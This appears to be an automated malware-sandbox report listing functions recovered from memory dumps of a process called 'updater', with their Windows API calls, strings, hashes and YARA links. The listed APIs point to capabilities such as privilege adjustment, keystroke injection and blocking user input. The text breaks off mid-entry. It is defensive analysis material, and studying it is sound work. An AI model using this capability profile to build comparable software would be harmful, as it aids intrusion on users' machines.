Opcode ID: 0a25b7fb68d4edff8e890ef957efc0e73b1c0a491b6ac13546196c0f521c5a72
Instruction ID: 0042da3ef4e857c77bb004d003325c9aa45088cd7aae3530ae0b011e2cd5e9a4
Opcode Fuzzy Hash: 0a25b7fb68d4edff8e890ef957efc0e73b1c0a491b6ac13546196c0f521c5a72
Instruction Fuzzy Hash: 9E110136350A119FE7211F269C84B7EBBE9FF85721F114529F906D7242CB70EE029AE0

Function 00C1C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C1CA75
CoCreateInstance.OLE32(00C43D3C,00000000,00000001,00C43BAC,?), ref: 00C1CA8D

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

CoUninitialize.OLE32 ref: 00C1CCFA

Strings

.lnk, xrefs: 00C1CA09, 00C1CA31, 00C1CA3B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 7178161fad4e59964892ff7b5eb196776811c8a7e8359e79315b518c94d0bfed
Instruction ID: 1101cc7987998ddd3983d5c85136bff938c76c5d98c1324117229ec2e7646e9b
Opcode Fuzzy Hash: 7178161fad4e59964892ff7b5eb196776811c8a7e8359e79315b518c94d0bfed
Instruction Fuzzy Hash: 77A10971104205AFD300EF64C891EABB7E8FF95714F00496CF5559B2A2EBB0EE49CB92

Function 00C2C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BF027A,?), ref: 00C2C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C2C6F9

Strings

kernel32.dll, xrefs: 00C2C6E2
GetSystemWow64DirectoryW, xrefs: 00C2C6F3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: c1d37a5b13a4c6c22a893040526196c49dc9ed11e22bae39f7de765ba08b5d43
Instruction ID: 3c93f746818d08f802ea364985d5d33d2629c2d9343ea3b36be9a2ff07af0137
Opcode Fuzzy Hash: c1d37a5b13a4c6c22a893040526196c49dc9ed11e22bae39f7de765ba08b5d43
Instruction Fuzzy Hash: 1DE0C27D1507228FD7305B25DC89F5E76D4FF14B04B608429E995C2610DB70CC80CF10

Function 00BF0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00BF0034
__swprintf.LIBCMT ref: 00BF0065

Strings

WIN_XPe, xrefs: 00BF00A4
%.3d, xrefs: 00BF003F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 7cc60c98020edce14a77bfa79cf1dece12d983fc0b0a94fc943b2313b0b31edb
Instruction ID: f0b7e006dbf6ef4b6c224b72d59e0342ca50489ffe22e596adadfb9506867509
Opcode Fuzzy Hash: 7cc60c98020edce14a77bfa79cf1dece12d983fc0b0a94fc943b2313b0b31edb
Instruction Fuzzy Hash: 01D01D7185411CEAC714A670C9C4EF973FCA704300F1400D2F705D3051DA75475CAB12

Function 00C14148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C1416D
Process32FirstW.KERNEL32(00000000,?), ref: 00C1417B
Process32NextW.KERNEL32(00000000,?), ref: 00C1419B
CloseHandle.KERNEL32(00000000), ref: 00C14245

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 2ece8e6309847c9d8647fe01b98035b4e43218c93b4bfe79e7af12d0d3b8afbe
Instruction ID: a9c1281fada2bae7bc127dfc99bf15adbd7add37755a9f3af21123513077cf38
Opcode Fuzzy Hash: 2ece8e6309847c9d8647fe01b98035b4e43218c93b4bfe79e7af12d0d3b8afbe
Instruction Fuzzy Hash: 2631CE711083419FC304EF54D885FAFBBE8FF96350F10092DF591961A2EB709A89CB92

Function 00C229BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C21ED6,00000000), ref: 00C22AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C22AE4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 5465b3ff128bed257d0f9b801431d475caf6dbadcafe8cd6e0a6705a450d5683
Instruction ID: 33e1ce2b51cfa6e83abb7f7b784af454d48fd5b8820d0518e2efa1c52a7422e6
Opcode Fuzzy Hash: 5465b3ff128bed257d0f9b801431d475caf6dbadcafe8cd6e0a6705a450d5683
Instruction Fuzzy Hash: BC41E471600319FFEB20DE55EC85FBFB7ECEB40754F10405AF605A7A41EA70AE41AA60

Function 00C1B976 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C1B986
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C1B9E0
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C1BA2D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 57a86781165bd952a322420af5c7cf89c3576f5ecffeaa6b534833fb806acadc
Instruction ID: 25b5e16683ae5aa7d522d29f2d63f55ceae9a79090910a92e27ded7e1a8e8282
Opcode Fuzzy Hash: 57a86781165bd952a322420af5c7cf89c3576f5ecffeaa6b534833fb806acadc
Instruction Fuzzy Hash: F0215C35A00108EFCB00EFA5D884BEEBBB8FF49310F1481A9E905AB252DB71A955DB51

Function 00C09399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0FE6: std::exception::exception.LIBCMT ref: 00BD101C
Part of subcall function 00BD0FE6: __CxxThrowException@8.LIBCMT ref: 00BD1031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C093E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C09410
GetLastError.KERNEL32 ref: 00C0941D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: fe34c765bf666b895cbe82424bd35491a5571251a549349df41e2fcc7dab6b0e
Instruction ID: 7df31cb743eff3b2268252e8f177656821c530ada08bcc8b5fe411956ad8d747
Opcode Fuzzy Hash: fe34c765bf666b895cbe82424bd35491a5571251a549349df41e2fcc7dab6b0e
Instruction Fuzzy Hash: 71113DB1414205AFD728AF54EC85E2BB7F8FB44710B20856EF45A96291EA70AC41CA60

Function 00C142D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C142FF
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00C1433C
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C14345

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: b5efe68c9392e86c020bb6707291e51914dce0c7716aef82e1d891c396bbaf96
Instruction ID: 7cc57934ec50e05d5c0b78c9b42be922ffbd19a357408b4dd344a30b48517c79
Opcode Fuzzy Hash: b5efe68c9392e86c020bb6707291e51914dce0c7716aef82e1d891c396bbaf96
Instruction Fuzzy Hash: 671186B1940225BEE7109BE89C44FFFB7BCE709720F100556FA24F71A0C2745E4487A1

Function 00C14F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C14F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C14F5C
FreeSid.ADVAPI32(?), ref: 00C14F6C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8aac59ccd401d18051f92a6898f0c83a00758b1939941c50659df1093dac1d80
Instruction ID: 4fb419c677862e97fbeb1a48e55febbfc3141399328c98028f9614e0a06d9bab
Opcode Fuzzy Hash: 8aac59ccd401d18051f92a6898f0c83a00758b1939941c50659df1093dac1d80
Instruction Fuzzy Hash: 50F04F7595130CBFDF04DFE0DC89BADB7BCFF09211F104469AA01E2180D7345A448B50

Function 00C1494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00BFFC86), ref: 00C1495A
FindFirstFileW.KERNEL32(?,?), ref: 00C1496B
FindClose.KERNEL32(00000000), ref: 00C1497B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: dd52d2f7c574b0b09682381030fa24396545f0cf846697ecf25a13f02d089e1d
Instruction ID: 1cfa46290352289243dcab60e3b7a3fc7801830656dbd7108791097f1844c3ab
Opcode Fuzzy Hash: dd52d2f7c574b0b09682381030fa24396545f0cf846697ecf25a13f02d089e1d
Instruction Fuzzy Hash: 58E0263586050AAB8214673CEC0DAEF775CAE07339F200705FA35C20E0EBB09E94A6D6

Function 00C1CD14 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C1CD3E
FindClose.KERNEL32(00000000), ref: 00C1CD6E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 65a6a92d0f4ebea4229a197fbe20a75e09c7202f69afca0ec56b368f20e40d81
Instruction ID: dc76cad1d6d70c58675c1b6e5a8345abf2e090ff6404614169992da6b330f82e
Opcode Fuzzy Hash: 65a6a92d0f4ebea4229a197fbe20a75e09c7202f69afca0ec56b368f20e40d81
Instruction Fuzzy Hash: D911C4316006009FD710EF29D845A6EF7E5FF85324F108A6DF9A987292CB70AC01CB81

Function 017B86E1 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,017B8745), ref: 017B8707
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,017B8745), ref: 017B8720

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 9a07d072f328b2646f10872d963945e5600693677e9d5c745e277fc1a0ab9056
Instruction ID: 19e7a448d0e65340524f7928aa3f412dbf387ebc07e53a53c04e78fbb6210d5d
Opcode Fuzzy Hash: 9a07d072f328b2646f10872d963945e5600693677e9d5c745e277fc1a0ab9056
Instruction Fuzzy Hash: 5FF09071E083096FEB00EEE2CC99ADEF3BEEBC8714F44C864A11097684EF7466008650

Function 017B47C5 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,017C722C,00000000,017C7338), ref: 017B47E0
GetLastError.KERNEL32(00000000,?,?,?,?,017C722C,00000000,017C7338), ref: 017B4805

Part of subcall function 017B4759: FileTimeToLocalFileTime.KERNEL32(?), ref: 017B4789
Part of subcall function 017B4759: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 017B4798

Part of subcall function 017B4839: FindClose.KERNEL32(?,?,017B4803,00000000,?,?,?,?,017C722C,00000000,017C7338), ref: 017B4845

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: FileTime$Find$CloseDateErrorFirstLastLocal
String ID:
API String ID: 976985129-0
Opcode ID: 85bab9cfd6657be81c477965d7c9920948d62e9ac6640ead121c592b0455e55b
Instruction ID: d103b9212fcc58c47e17feb680d6eb2869d66b6224e166787d2cdeec5d12d9b4
Opcode Fuzzy Hash: 85bab9cfd6657be81c477965d7c9920948d62e9ac6640ead121c592b0455e55b
Instruction Fuzzy Hash: E6E09B76B021214747156EBD5CCC7DAD5D889946703090376F927DB34BDB34CC1183D0

Function 00C11AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C11B01
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00C11B14

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: c588603ab386e8faa6684515ca59ae32b67a483719b6cedfcc389f57bf8f7e8e
Instruction ID: 7bd490ad121db79fc93fa5e70201d6bf364d1596aba0a60697999d03f0338da8
Opcode Fuzzy Hash: c588603ab386e8faa6684515ca59ae32b67a483719b6cedfcc389f57bf8f7e8e
Instruction Fuzzy Hash: 22F0377594420DABDB00CF95C805BFE7BB4FF04316F10804AFE5596292D3799615DF98

Function 00C1A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00C29B52,?,00C4098C,?), ref: 00C1A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00C29B52,?,00C4098C,?), ref: 00C1A6EC

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 7246ee5cd6926bf770453e97bad9db525b83f8d370d660ed344cac7afcdc977b
Instruction ID: 4ad93ad5419ee0faf5e73f631ee0dafd85226f152ad2ad6f8a08f2084c64c7b0
Opcode Fuzzy Hash: 7246ee5cd6926bf770453e97bad9db525b83f8d370d660ed344cac7afcdc977b
Instruction Fuzzy Hash: 3CF0A73555522DBBDB20AFA4CC48FEE77ACFF0A761F008255B918D6191D6709A40CBE1

Function 00C08DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C08F27), ref: 00C08DFE
CloseHandle.KERNEL32(?,?,00C08F27), ref: 00C08E10

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 07abe589d08bf224a11e14c6e4a31cfceeac39f44d69aad8d5850cbfb317e68d
Instruction ID: d0f9d05fa32384ed7f9c50c3b01cced8796baf44183221608d297f38e56e3c95
Opcode Fuzzy Hash: 07abe589d08bf224a11e14c6e4a31cfceeac39f44d69aad8d5850cbfb317e68d
Instruction Fuzzy Hash: 3BE09A75010610AEE7252B54EC09A77BBA9EB042107248959F5A580470DA715C90DB50

Function 00BDA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BD8F87,?,?,?,00000001), ref: 00BDA38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BDA393

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eea0f500a69137a50b846fbf8a9c786a42f3036c62bb539953b9e4fd3226330b
Instruction ID: e87c3dfa9106a192aaf6d8559b53e98f3ef974439b2b6f28fa383fd982dfc12d
Opcode Fuzzy Hash: eea0f500a69137a50b846fbf8a9c786a42f3036c62bb539953b9e4fd3226330b
Instruction Fuzzy Hash: 2AB092350A4608ABCA402F91EC09B8C3F68FB46A62F104010FB0D44070CB7254508A91

Function 017B2AE9 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,017B2B4F), ref: 017B2B0F

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 3626108106674e8e39bd924a5608cfe8aa2b813729f00b467fbac6170cab0d3e
Instruction ID: 3ca884b3b5ec1373bef9ea99c67f8f88833250b4b49384c4a9efa42d7b78267b
Opcode Fuzzy Hash: 3626108106674e8e39bd924a5608cfe8aa2b813729f00b467fbac6170cab0d3e
Instruction Fuzzy Hash: 2DF0A43090860AAFE714DF91CC95BDFF37AF784710F408974A12057584EB743A048640

Function 017B7149 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 017B7167

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8c85d529f1f020f63ef7f35d006a93bef216e000dc5b01d4844948bf4808de50
Instruction ID: 5fd87cd1fe91025bdcc23e6379ad7095279048fe1acf7373d45e8000b67452c6
Opcode Fuzzy Hash: 8c85d529f1f020f63ef7f35d006a93bef216e000dc5b01d4844948bf4808de50
Instruction Fuzzy Hash: C2E0D831B1461827D315A55C5CC8BFBF26D97AC210F00426EBD05C7384EFA0AE8046E5

Function 00C245D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C245F0

Memory Dump Source

